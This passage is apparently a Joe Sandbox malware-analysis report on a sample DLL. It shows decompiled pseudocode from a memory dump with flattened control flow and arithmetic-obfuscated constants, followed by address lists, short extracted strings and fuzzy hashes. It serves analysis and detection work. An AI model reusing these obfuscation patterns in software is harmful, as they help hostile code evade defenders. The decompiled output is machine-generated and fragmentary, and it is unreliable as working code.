				_v696 = 0x58c3;
				_v696 = _v696 << 0xd;
				_v696 = _v696 >> 2;
				_v696 = _v696 >> 6;
				_v696 = _v696 ^ 0x000b0542;
				_v680 = 0x7bce;
				_v680 = _v680 + 0xffffd7b2;
				_v680 = _v680 ^ 0x9276ba2e;
				_v680 = _v680 * 0x4f;
				_v680 = _v680 ^ 0x32b2725f;
				_v556 = 0x37b8;
				_v556 = _v556 * 0x50;
				_v556 = _v556 ^ 0x001156bf;
				_v624 = 0xc402;
				_v624 = _v624 / _t510;
				_t511 = 0x3f;
				_t502 = 6;
				_v624 = _v624 * 0x78;
				_v624 = _v624 ^ 0x0001b435;
				_v580 = 0xacb9;
				_v580 = _v580 + 0xffffe8bf;
				_v580 = _v580 ^ 0x0000921f;
				_v640 = 0x79b0;
				_v640 = _v640 ^ 0x08b585e1;
				_v640 = _v640 + 0x1e13;
				_v640 = _v640 ^ 0x08b608dd;
				_v572 = 0x1f93;
				_v572 = _v572 | 0xb873ffd6;
				_v572 = _v572 ^ 0xb873c7ec;
				_v656 = 0x9e22;
				_v656 = _v656 + 0xffffc50b;
				_v656 = _v656 / _t511;
				_v656 = _v656 ^ 0x000014c8;
				_v724 = 0xa715;
				_v724 = _v724 / _t502;
				_v724 = _v724 ^ 0x8b24d62d;
				_t564 = 0x4f;
				_v724 = _v724 / _t564;
				_v724 = _v724 ^ 0x01c292ff;
				_v632 = 0x3883;
				_v632 = _v632 >> 7;
				_v632 = _v632 >> 4;
				_v632 = _v632 ^ 0x0000065c;
				_v700 = 0x32e6;
				_v700 = _v700 >> 0xa;
				_v700 = _v700 + 0x4acf;
				_v700 = _v700 * 0x69;
				_v700 = _v700 ^ 0x001eedb7;
				_v708 = 0x1f64;
				_v708 = _v708 + 0xffff18ab;
				_v708 = _v708 ^ 0xe318c4e8;
				_v708 = _v708 | 0x6f3290f4;
				_v708 = _v708 ^ 0x7ff7d0c6;
				_v644 = 0xc1fd;
				_v644 = _v644 | 0x2cccc8d2;
				_t512 = 0x64;
				_v644 = _v644 / _t512;
				_v644 = _v644 ^ 0x0072df32;
				_v716 = 0x696f;
				_v716 = _v716 ^ 0x72776147;
				_v716 = _v716 + 0xffffc5d0;
				_v716 = _v716 ^ 0x7276e505;
				_v596 = 0x8ab4;
				_t513 = 0x62;
				_v596 = _v596 / _t513;
				_v596 = _v596 ^ 0x00003466;
				_v560 = 0x3fc9;
				_v560 = _v560 / _t564;
				_v560 = _v560 ^ 0x00003d0e;
				_v720 = 0xf9fd;
				_v720 = _v720 | 0x59d895f3;
				_v720 = _v720 + 0xffffef32;
				_v720 = _v720 | 0x9c01a373;
				_v720 = _v720 ^ 0xddd9e3b5;
				_v564 = 0x533a;
				_t514 = 0x7b;
				_v564 = _v564 / _t514;
				_v564 = _v564 ^ 0x0000101a;
				_v664 = 0xcaf9;
				_v664 = _v664 | 0x8246bf69;
				_v664 = _v664 ^ 0xe3049bde;
				_v664 = _v664 ^ 0x274f5234;
				_v664 = _v664 ^ 0x460d6397;
				_v588 = 0xa2a1;
				_v588 = _v588 | 0xd21325c9;
				_v588 = _v588 ^ 0xd213d3a4;
				_v688 = 0xb83d;
				_v688 = _v688 + 0xffff84b7;
				_v688 = _v688 + 0xe0b4;
				_v688 = _v688 + 0xd09;
				_v688 = _v688 ^ 0x00013826;
				_v652 = 0xd037;
				_t515 = 0x7e;
				_v652 = _v652 / _t515;
				_v652 = _v652 + 0xffff26c9;
				_v652 = _v652 ^ 0xffff70bd;
				_v608 = 0x4293;
				_v608 = _v608 << 0xc;
				_v608 = _v608 ^ 0x042926c6;
				_v704 = 0xcab7;
				_v704 = _v704 << 9;
				_v704 = _v704 >> 4;
				_t472 = _v704;
				_t558 = _t472 % _t502;
				_v704 = _t472 / _t502;
				_v704 = _v704 ^ 0x00045174;
				_v552 = 0xb8b4;
				_t565 = _v544;
				_t503 = _v544;
				_v552 = _v552 * 0x4e;
				_v552 = _v552 ^ 0x00387999;
				_v672 = 0x2bf0;
				_v672 = _v672 | 0xf60bc9fe;
				_v672 = _v672 + 0x57d1;
				_v672 = _v672 ^ 0xf60c66e5;
				_v712 = 0x7c95;
				_v712 = _v712 + 0xffffb183;
				_v712 = _v712 | 0x5f717fbf;
				_v712 = _v712 ^ 0x5f710688;
				_v660 = 0x7905;
				_v660 = _v660 + 0x7821;
				_v660 = _v660 ^ 0x36fe040c;
				_v660 = _v660 + 0xffffb02a;
				_v660 = _v660 ^ 0x36fee51b;
				_v568 = 0x40ec;
				_v568 = _v568 * 0x31;
				_v568 = _v568 ^ 0x000c4283;
				while(1) {
					L1:
					_t476 = 0x32edf131;
					while(1) {
						L2:
						_t516 = 0x12c173de;
						do {
							while(1) {
								L3:
								_t575 = _t566 - 0x298a7590;
								if(_t575 <= 0) {
									break;
								}
								__eflags = _t566 - 0x2feccba1;
								if(_t566 == 0x2feccba1) {
									__eflags = _t503 - _t476;
									if(_t503 != _t476) {
										_t566 = 0x38a72f3e;
										goto L30;
									} else {
										_push(_v584);
										_push(_v668);
										_t558 = _v612;
										E10003336(_v576, _v612, _t516,  &_v548, _t516);
										_t571 = _t571 + 0x14;
										asm("sbb esi, esi");
										_t566 = (_t566 & 0x0682b5e8) + 0x32247956;
										while(1) {
											L1:
											_t476 = 0x32edf131;
											L2:
											_t516 = 0x12c173de;
											goto L3;
										}
									}
								} else {
									__eflags = _t566 - 0x32247956;
									if(_t566 == 0x32247956) {
										return E1000DE81(_v660, _t565, _v568);
									}
									__eflags = _t566 - 0x38a72f3e;
									if(_t566 != 0x38a72f3e) {
										goto L30;
									} else {
										_t558 = _v544;
										_push( &_v524);
										_push(0x10001020);
										_t497 = E1001B165(_t570, _v544);
										__eflags = _t497;
										_t476 = 0x32edf131;
										if(_t497 == 0) {
											__eflags = _t503 - 0x32edf131;
											if(__eflags == 0) {
												_t558 = _v628;
												E1000F1ED(_v620, _v628, _v592, _v600, _v548);
												_t571 = _t571 + 0xc;
												_t476 = 0x32edf131;
											}
											_t566 = 0x32247956;
											while(1) {
												L2:
												_t516 = 0x12c173de;
												goto L3;
											}
										} else {
											__eflags = _t503 - 0x32edf131;
											_t516 = 0x12c173de;
											_t566 =  ==  ? 0x12c173de : 0x13c1a9f6;
											continue;
										}
									}
								}
								L34:
								return _t485;
							}
							if(_t575 == 0) {
								_t480 = E1000F2AB();
								__eflags = E10011DFE(_t558) - _t480;
								_t476 = 0x32edf131;
								_t566 = 0x2feccba1;
								_t503 =  !=  ? 0x32edf131 : 0x251cf005;
								goto L2;
							}
							if(_t566 != 0x20234bc) {
								if(_t566 == 0x31b2709) {
									 *((intOrPtr*)(_t565 + 0x44)) = _t570;
									_t486 =  *0x10021084;
									 *_t565 = _t486;
									 *0x10021084 = _t565;
									return _t486;
								}
								if(_t566 == _t516) {
									_push( &_v540);
									_push(_t516);
									_t488 = E100193AA(_v616,  &_v524, _t516, _v548, _v728, _v648, _v696, _v680);
									_t572 = _t571 + 0x20;
									__eflags = _t488;
									if(_t488 != 0) {
										E1000F1ED(_v556, _v624, _v580, _v640, _v540);
										E1000F1ED(_v572, _v656, _v724, _v632, _v536);
										_t572 = _t572 + 0x18;
									}
									_push(_v548);
									_push(_v716);
									_push(_v644);
									_t558 = _v708;
									_t519 = _v700;
									goto L11;
								} else {
									_t579 = _t566 - 0x13c1a9f6;
									if(_t566 != 0x13c1a9f6) {
										goto L30;
									} else {
										_push(0);
										_push(0);
										_push(_v664);
										_push(_v564);
										_push(_v720);
										_push(_v560);
										_t558 = _v596;
										_push( &_v524);
										_push( &_v540);
										_t494 = E10006417(_v596, _t579);
										_t571 = _t571 + 0x20;
										if(_t494 != 0) {
											E1000F1ED(_v588, _v688, _v652, _v608, _v540);
											_t572 = _t571 + 0xc;
											_push(_v536);
											_push(_v712);
											_push(_v672);
											_t558 = _v552;
											_t519 = _v704;
											L11:
											E1000F1ED(_t519, _t558);
											_t571 = _t572 + 0xc;
										}
										_t566 = 0x31b2709;
										while(1) {
											L1:
											_t476 = 0x32edf131;
											goto L2;
										}
									}
								}
								goto L34;
							}
							_push(_t516);
							_t558 = 0x50;
							_t485 = E100054FB(_t558);
							_t565 = _t485;
							__eflags = _t565;
							if(__eflags != 0) {
								_t566 = 0x298a7590;
								goto L1;
							}
							goto L34;
							L30:
							__eflags = _t566 - 0x1687916a;
						} while (__eflags != 0);
						return _t476;
					}
				}
			}

0x10002419
0x10002420
0x10002422
0x1000242a
0x10002435
0x10002440
0x1000244b
0x10002453
0x1000245b
0x10002460
0x10002468
0x10002470
0x1000247b
0x10002486
0x10002491
0x10002499
0x100024a1
0x100024a9
0x100024b1
0x100024b9
0x100024c1
0x100024c9
0x100024d1
0x100024d9
0x100024e1
0x100024ee
0x100024f2
0x100024fa
0x100024ff
0x1000250a
0x10002521
0x10002524
0x1000252b
0x10002536
0x1000253e
0x10002543
0x1000254b
0x10002553
0x1000255b
0x10002566
0x10002571
0x1000257c
0x10002587
0x1000259d
0x100025a4
0x100025af
0x100025bb
0x100025c0
0x100025ca
0x100025cd
0x100025d1
0x100025d9
0x100025e4
0x100025ef
0x100025fa
0x10002605
0x1000260d
0x10002618
0x10002623
0x1000262b
0x10002633
0x1000263e
0x10002646
0x10002653
0x10002658
0x10002663
0x10002666
0x1000266a
0x10002672
0x1000267f
0x10002683
0x1000268b
0x10002693
0x1000269b
0x100026a0
0x100026a5
0x100026aa
0x100026b2
0x100026ba
0x100026c2
0x100026cf
0x100026d3
0x100026db
0x100026ee
0x100026f5
0x10002700
0x10002716
0x10002725
0x10002728
0x1000272b
0x10002732
0x1000273d
0x10002748
0x10002753
0x1000275e
0x10002766
0x1000276e
0x10002776
0x1000277e
0x10002789
0x10002794
0x1000279f
0x100027a7
0x100027b7
0x100027bb
0x100027c3
0x100027d3
0x100027d7
0x100027e3
0x100027e6
0x100027ea
0x100027f2
0x100027fa
0x100027ff
0x10002804
0x1000280c
0x10002814
0x10002819
0x10002826
0x1000282c
0x10002834
0x1000283c
0x10002844
0x1000284c
0x10002854
0x1000285c
0x10002864
0x10002872
0x10002877
0x1000287b
0x10002883
0x1000288b
0x1000289b
0x100028a3
0x100028ab
0x100028bf
0x100028c4
0x100028cb
0x100028d6
0x100028ec
0x100028f3
0x100028fe
0x10002906
0x1000290e
0x10002916
0x1000291e
0x10002926
0x1000293a
0x1000293f
0x10002946
0x10002951
0x10002959
0x10002961
0x10002969
0x10002971
0x10002979
0x10002984
0x1000298f
0x1000299a
0x100029a2
0x100029aa
0x100029b2
0x100029ba
0x100029c2
0x100029d0
0x100029d5
0x100029d9
0x100029e1
0x100029e9
0x100029f4
0x100029fc
0x10002a07
0x10002a0f
0x10002a14
0x10002a19
0x10002a1d
0x10002a1f
0x10002a23
0x10002a2b
0x10002a3e
0x10002a45
0x10002a4c
0x10002a53
0x10002a5e
0x10002a66
0x10002a6e
0x10002a76
0x10002a7e
0x10002a86
0x10002a8e
0x10002a96
0x10002a9e
0x10002aa6
0x10002aae
0x10002ab6
0x10002abe
0x10002ac6
0x10002ad9
0x10002ae0
0x10002aeb
0x10002aeb
0x10002aeb
0x10002af0
0x10002af0
0x10002af0
0x10002af5
0x10002af5
0x10002af5
0x10002af5
0x10002afb
0x00000000
0x00000000
0x10002cbc
0x10002cc2
0x10002d58
0x10002d5a
0x10002d9c
0x00000000
0x10002d5c
0x10002d5c
0x10002d6a
0x10002d6e
0x10002d7f
0x10002d84
0x10002d89
0x10002d91
0x10002aeb
0x10002aeb
0x10002aeb
0x10002af0
0x10002af0
0x00000000
0x10002af0
0x10002aeb
0x10002cc8
0x10002cc8
0x10002cce
0x00000000
0x10002dd3
0x10002cd4
0x10002cda
0x00000000
0x10002ce0
0x10002ce0
0x10002cee
0x10002cef
0x10002cf6
0x10002cfc
0x10002cfe
0x10002d04
0x10002d1a
0x10002d1c
0x10002d33
0x10002d41
0x10002d46
0x10002d49
0x10002d49
0x10002d4e
0x10002af0
0x10002af0
0x10002af0
0x00000000
0x10002af0
0x10002d06
0x10002d06
0x10002d0d
0x10002d12
0x00000000
0x10002d12
0x10002d04
0x10002cda
0x10002dde
0x10002dde
0x10002dde
0x10002b01
0x10002c97
0x10002ca3
0x10002caa
0x10002caf
0x10002cb4
0x00000000
0x10002cb4
0x10002b0d
0x10002b19
0x10002daf
0x10002db2
0x10002db7
0x10002db9
0x00000000
0x10002db9
0x10002b21
0x10002bc8
0x10002bc9
0x10002bf0
0x10002bf5
0x10002bf8
0x10002bfa
0x10002c1c
0x10002c3e
0x10002c43
0x10002c43
0x10002c46
0x10002c4d
0x10002c51
0x10002c55
0x10002c59
0x00000000
0x10002b27
0x10002b27
0x10002b2d
0x00000000
0x10002b33
0x10002b33
0x10002b35
0x10002b37
0x10002b42
0x10002b49
0x10002b4d
0x10002b54
0x10002b5b
0x10002b63
0x10002b64
0x10002b69
0x10002b6e
0x10002b8d
0x10002b92
0x10002b95
0x10002b9c
0x10002ba0
0x10002ba4
0x10002bab
0x10002baf
0x10002baf
0x10002bb4
0x10002bb4
0x10002bb7
0x10002aeb
0x10002aeb
0x10002aeb
0x00000000
0x10002aeb
0x10002aeb
0x10002b2d
0x00000000
0x10002b21
0x10002c6d
0x10002c70
0x10002c71
0x10002c76
0x10002c79
0x10002c7b
0x10002c81
0x00000000
0x10002c81
0x00000000
0x10002da1
0x10002da1
0x10002da1
0x00000000
0x10002af5
0x10002af0

Strings

2, xrefs: 1000280C
#t, xrefs: 100025D1
@, xrefs: 10002AC6
!x, xrefs: 10002AA6
s, xrefs: 10002499
4RO', xrefs: 10002969
f4, xrefs: 100028CB
Gawr, xrefs: 1000288B
:S, xrefs: 10002926
Vy$2, xrefs: 10002CC8
$,, xrefs: 10002587
u, xrefs: 10002460
Vy$2, xrefs: 10002D4E

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !x$#t$$,$4RO'$:S$Gawr$Vy$2$Vy$2$f4$s$u$2$@
API String ID: 0-1200869751
Opcode ID: 95399769a550455cde7ee04ad3e7fcbd5c08ab82ec1dc29643bf05c260ef95f0
Instruction ID: aab9cf7fc28d0a1e7181d19de550ec1a1dc7233dd7a3c9457c9bc38238ea37c3
Opcode Fuzzy Hash: 95399769a550455cde7ee04ad3e7fcbd5c08ab82ec1dc29643bf05c260ef95f0
Instruction Fuzzy Hash: 62321371508381DFE378CF25C986A8BBBE2BBC4344F10891DE5C9962A4DBB59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001BBF1 Relevance: 16.5, Strings: 13, Instructions: 269
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E1001BBF1(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr* _t270;
				void* _t271;
				intOrPtr* _t272;
				intOrPtr* _t275;
				intOrPtr _t276;
				intOrPtr _t278;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				void* _t289;
				void* _t318;
				intOrPtr* _t326;
				void* _t327;
				void* _t330;
				signed int* _t331;

				_t331 =  &_v96;
				_v36 = 0x7971;
				_v36 = _v36 >> 4;
				_v36 = _v36 >> 3;
				_v36 = _v36 ^ 0x0000182f;
				_v40 = 0xfd3e;
				_v40 = _v40 ^ 0x584e228f;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x0000cb4e;
				_v60 = 0xc7d1;
				_v60 = _v60 * 0x1a;
				_t330 = __edx;
				_v60 = _v60 ^ 0xe7356e21;
				_v60 = _v60 ^ 0xe721078e;
				_t278 = __ecx;
				_v12 = 0x8b7c;
				_t326 = 0;
				_t327 = 0xc32a3cb;
				_t280 = 0x76;
				_v12 = _v12 / _t280;
				_v12 = _v12 ^ 0x0000029d;
				_v64 = 0x73a3;
				_v64 = _v64 | 0x4efcdde2;
				_v64 = _v64 ^ 0xed66e3eb;
				_v64 = _v64 ^ 0xa39a41bb;
				_v16 = 0x4227;
				_t281 = 0x6d;
				_v16 = _v16 / _t281;
				_v16 = _v16 ^ 0x00001ea2;
				_v72 = 0x8c44;
				_v72 = _v72 << 1;
				_v72 = _v72 >> 9;
				_v72 = _v72 + 0xffffe8d2;
				_v72 = _v72 ^ 0xffffd00c;
				_v52 = 0xbd45;
				_v52 = _v52 | 0x9852b62d;
				_v52 = _v52 ^ 0xe9b55024;
				_v52 = _v52 ^ 0x71e7e0db;
				_v56 = 0x6ad6;
				_v56 = _v56 | 0xcbfebfcb;
				_t282 = 0x29;
				_v56 = _v56 / _t282;
				_v56 = _v56 ^ 0x04f9ee03;
				_v76 = 0x6ec;
				_v76 = _v76 + 0xffffce11;
				_v76 = _v76 + 0xffff084a;
				_v76 = _v76 + 0xffff2b6a;
				_v76 = _v76 ^ 0xfffe3623;
				_v44 = 0x29d6;
				_v44 = _v44 << 1;
				_t283 = 0x5a;
				_v44 = _v44 / _t283;
				_v44 = _v44 ^ 0x00000afa;
				_v48 = 0xe792;
				_v48 = _v48 + 0x94ab;
				_t284 = 0x2e;
				_v48 = _v48 / _t284;
				_v48 = _v48 ^ 0x000072c7;
				_v4 = 0xd512;
				_v4 = _v4 + 0xffff3306;
				_v4 = _v4 ^ 0x00006e5d;
				_v8 = 0x264b;
				_v8 = _v8 + 0xffff8ff4;
				_v8 = _v8 ^ 0xffff8e36;
				_v80 = 0x7210;
				_v80 = _v80 ^ 0x6afff0fe;
				_t285 = 0x11;
				_v80 = _v80 / _t285;
				_v80 = _v80 << 6;
				_v80 = _v80 ^ 0x92d08612;
				_v84 = 0x33aa;
				_v84 = _v84 ^ 0x3f3ff109;
				_v84 = _v84 + 0xffff35d7;
				_t286 = 0x2f;
				_v84 = _v84 / _t286;
				_v84 = _v84 ^ 0x015805a3;
				_v88 = 0x96ab;
				_t287 = 0x47;
				_v88 = _v88 * 0x24;
				_v88 = _v88 * 0x4e;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x3a51b47d;
				_v92 = 0x8813;
				_v92 = _v92 | 0x160d8541;
				_v92 = _v92 + 0xffff816c;
				_v92 = _v92 * 0xf;
				_v92 = _v92 ^ 0x4ac3c30b;
				_v68 = 0x7d5a;
				_v68 = _v68 + 0xa00e;
				_v68 = _v68 ^ 0xd0cc0e09;
				_v68 = _v68 ^ 0xd0cd7390;
				_v20 = 0x6856;
				_v20 = _v20 | 0xcedc98a4;
				_v20 = _v20 ^ 0xcedcfbdf;
				_v24 = 0xae99;
				_v24 = _v24 >> 8;
				_v24 = _v24 ^ 0x0000275a;
				_v96 = 0xb43a;
				_v96 = _v96 * 0x19;
				_v96 = _v96 / _t287;
				_t288 = 3;
				_v96 = _v96 * 0x17;
				_v96 = _v96 ^ 0x0005aff4;
				_v28 = 0x55f9;
				_v28 = _v28 >> 1;
				_v28 = _v28 + 0x6ee3;
				_v28 = _v28 ^ 0x0000aff9;
				_v32 = 0x362c;
				_v32 = _v32 / _t288;
				_v32 = _v32 << 5;
				_v32 = _v32 ^ 0x00022d08;
				while(1) {
					L1:
					while(1) {
						L2:
						_t289 = 0x23245655;
						do {
							L3:
							while(_t327 != 0xc32a3cb) {
								if(_t327 == 0xd077af0) {
									return E1000DE81(_v28, _t326, _v32);
								}
								if(_t327 == 0xf6ecb09) {
									_t270 = E10003B5C( *((intOrPtr*)(_t326 + 8)), _v4, _v8);
									_t331 =  &(_t331[1]);
									 *((intOrPtr*)(_t326 + 0x18)) = _t270;
									__eflags = _t270;
									_t289 = 0x23245655;
									_t271 = 0x24e45cbd;
									_t327 =  !=  ? 0x23245655 : 0x31f83ea5;
									continue;
								}
								if(_t327 == 0x20f8708a) {
									_push(_t289);
									_t272 = E10005B7D(_v60, _t330, __eflags, _v12, _v64, _v16);
									_t331 =  &(_t331[4]);
									 *((intOrPtr*)(_t326 + 8)) = _t272;
									__eflags = _t272;
									if(__eflags == 0) {
										L11:
										_t327 = 0xd077af0;
										while(1) {
											L1:
											L2:
											_t289 = 0x23245655;
											goto L3;
										}
									}
									E10005696(_v72,  *((intOrPtr*)(_t326 + 8)), _v52, _v56,  *((intOrPtr*)(_t326 + 8)), _v76);
									_push(_v48);
									E10011A48( *((intOrPtr*)(_t326 + 8)));
									_t331 =  &(_t331[5]);
									_t327 = 0xf6ecb09;
									while(1) {
										L1:
										goto L2;
									}
								}
								if(_t327 == _t289) {
									_push(E1000F369);
									_push(_v92);
									_push(_t289);
									_push(_v88);
									_push(_v84);
									_t275 = E1000903E(_t326, _v80);
									_t331 = _t331 - 0xc + 0x20;
									 *((intOrPtr*)(_t326 + 0x28)) = _t275;
									__eflags = _t275;
									_t271 = 0x24e45cbd;
									_t327 =  !=  ? 0x24e45cbd : 0x31f83ea5;
									goto L2;
								}
								if(_t327 == _t271) {
									 *((intOrPtr*)(_t326 + 0x44)) = _t278;
									_t276 =  *0x10021084;
									 *_t326 = _t276;
									 *0x10021084 = _t326;
									return _t276;
								}
								if(_t327 != 0x31f83ea5) {
									goto L19;
								}
								E1001A8BF(_v68, _v20, _v24, _v96,  *((intOrPtr*)(_t326 + 8)));
								_t331 =  &(_t331[3]);
								goto L11;
							}
							_push(_t289);
							_t318 = 0x50;
							_t326 = E100054FB(_t318);
							__eflags = _t326;
							if(__eflags == 0) {
								_t327 = 0xddc842e;
								_t289 = 0x23245655;
								goto L19;
							}
							_t327 = 0x20f8708a;
							goto L1;
							L19:
							__eflags = _t327 - 0xddc842e;
						} while (__eflags != 0);
						return _t271;
					}
				}
			}

0x1001bbf1
0x1001bbf4
0x1001bbfc
0x1001bc01
0x1001bc06
0x1001bc0e
0x1001bc16
0x1001bc1e
0x1001bc23
0x1001bc2b
0x1001bc3c
0x1001bc40
0x1001bc42
0x1001bc4c
0x1001bc54
0x1001bc56
0x1001bc5e
0x1001bc64
0x1001bc6b
0x1001bc70
0x1001bc76
0x1001bc7e
0x1001bc86
0x1001bc8e
0x1001bc96
0x1001bc9e
0x1001bcaa
0x1001bcaf
0x1001bcb5
0x1001bcbd
0x1001bcc5
0x1001bcc9
0x1001bcce
0x1001bcd6
0x1001bcde
0x1001bce6
0x1001bcee
0x1001bcf6
0x1001bcfe
0x1001bd06
0x1001bd12
0x1001bd17
0x1001bd1d
0x1001bd25
0x1001bd2d
0x1001bd35
0x1001bd3d
0x1001bd45
0x1001bd4d
0x1001bd55
0x1001bd5d
0x1001bd62
0x1001bd68
0x1001bd70
0x1001bd78
0x1001bd84
0x1001bd87
0x1001bd8b
0x1001bd95
0x1001bd9d
0x1001bda5
0x1001bdad
0x1001bdb5
0x1001bdbd
0x1001bdc5
0x1001bdcd
0x1001bddb
0x1001bde0
0x1001bde6
0x1001bdeb
0x1001bdf3
0x1001bdfb
0x1001be03
0x1001be0f
0x1001be14
0x1001be1a
0x1001be22
0x1001be2f
0x1001be32
0x1001be3b
0x1001be3f
0x1001be44
0x1001be4c
0x1001be54
0x1001be5c
0x1001be69
0x1001be6d
0x1001be75
0x1001be7d
0x1001be85
0x1001be8d
0x1001be95
0x1001be9d
0x1001bea5
0x1001bead
0x1001beb5
0x1001beba
0x1001bec2
0x1001becf
0x1001bedb
0x1001bee4
0x1001bee5
0x1001bee9
0x1001bef1
0x1001bef9
0x1001befd
0x1001bf05
0x1001bf0d
0x1001bf1b
0x1001bf1f
0x1001bf24
0x1001bf2c
0x1001bf2c
0x1001bf31
0x1001bf31
0x1001bf31
0x1001bf36
0x00000000
0x1001bf36
0x1001bf48
0x00000000
0x1001c0bf
0x1001bf54
0x1001c03b
0x1001c040
0x1001c043
0x1001c046
0x1001c04d
0x1001c052
0x1001c057
0x00000000
0x1001c057
0x1001bf60
0x1001bfd6
0x1001bfe9
0x1001bfee
0x1001bff1
0x1001bff4
0x1001bff6
0x1001bf95
0x1001bf95
0x1001bf2c
0x1001bf2c
0x1001bf31
0x1001bf31
0x00000000
0x1001bf31
0x1001bf2c
0x1001c00e
0x1001c013
0x1001c01e
0x1001c023
0x1001c026
0x1001bf2c
0x1001bf2c
0x00000000
0x1001bf2c
0x1001bf2c
0x1001bf64
0x1001bf9c
0x1001bfa4
0x1001bfa8
0x1001bfa9
0x1001bfaf
0x1001bfb7
0x1001bfbc
0x1001bfbf
0x1001bfc2
0x1001bfc9
0x1001bfce
0x00000000
0x1001bfce
0x1001bf68
0x1001c09e
0x1001c0a1
0x1001c0a6
0x1001c0a8
0x00000000
0x1001c0a8
0x1001bf74
0x00000000
0x00000000
0x1001bf8d
0x1001bf92
0x00000000
0x1001bf92
0x1001c067
0x1001c06a
0x1001c070
0x1001c073
0x1001c075
0x1001c081
0x1001c08b
0x00000000
0x1001c08b
0x1001c077
0x00000000
0x1001c090
0x1001c090
0x1001c090
0x00000000
0x1001bf36
0x1001bf31

Strings

UV$#, xrefs: 1001C08B
,6, xrefs: 1001BF0D
'B, xrefs: 1001BC9E
K&, xrefs: 1001BDAD
n, xrefs: 1001BEFD
qy, xrefs: 1001BBF4
f, xrefs: 1001BC8E
Z}, xrefs: 1001BE75
Z', xrefs: 1001BEBA
UV$#, xrefs: 1001BF31
Vh, xrefs: 1001BE95
]n, xrefs: 1001BDA5
UV$#, xrefs: 1001C04D

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'B$,6$K&$UV$#$UV$#$UV$#$Vh$Z'$Z}$]n$qy$n$f
API String ID: 0-847790408
Opcode ID: d18db09b0faadfb061b988d01f744b8e64b01c7cb996795b6b3781eb3c0fd8c2
Instruction ID: 802d974e315a371a4e4f5761a8a74a3644ddb8280565c47518f4cfac32237c21
Opcode Fuzzy Hash: d18db09b0faadfb061b988d01f744b8e64b01c7cb996795b6b3781eb3c0fd8c2
Instruction Fuzzy Hash: 5EC1327190C7419FE358CF25C88A50BBBE2FBC4348F108A1DF5969A2A0D7B5D945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 10013590 Relevance: 15.4, Strings: 12, Instructions: 440
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E10013590() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				void* _t494;
				signed int _t495;
				signed int _t498;
				void* _t507;
				signed int _t518;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				void* _t536;
				void* _t538;
				void* _t590;
				signed int* _t595;

				_t595 =  &_v1772;
				_v1576 = 0xd2493;
				_v1564 = 0;
				_v1572 = 0x5ead38;
				_v1568 = 0x4896fd;
				_v1724 = 0xb66c;
				_v1584 = 0;
				_t590 = 0x184e3bc6;
				_t521 = 0x45;
				_v1724 = _v1724 / _t521;
				_v1724 = _v1724 + 0x610;
				_v1724 = _v1724 >> 3;
				_v1724 = _v1724 ^ 0x0000013f;
				_v1616 = 0x7825;
				_t522 = 0x7d;
				_v1616 = _v1616 / _t522;
				_v1616 = _v1616 ^ 0x800000f7;
				_v1648 = 0x6e2f;
				_v1648 = _v1648 >> 0xb;
				_v1648 = _v1648 ^ 0x0000000f;
				_v1696 = 0x5cc1;
				_v1696 = _v1696 << 5;
				_v1696 = _v1696 | 0x9962b7ae;
				_v1696 = _v1696 ^ 0x996b80cb;
				_v1704 = 0xab0e;
				_t523 = 0x26;
				_v1704 = _v1704 / _t523;
				_v1704 = _v1704 << 6;
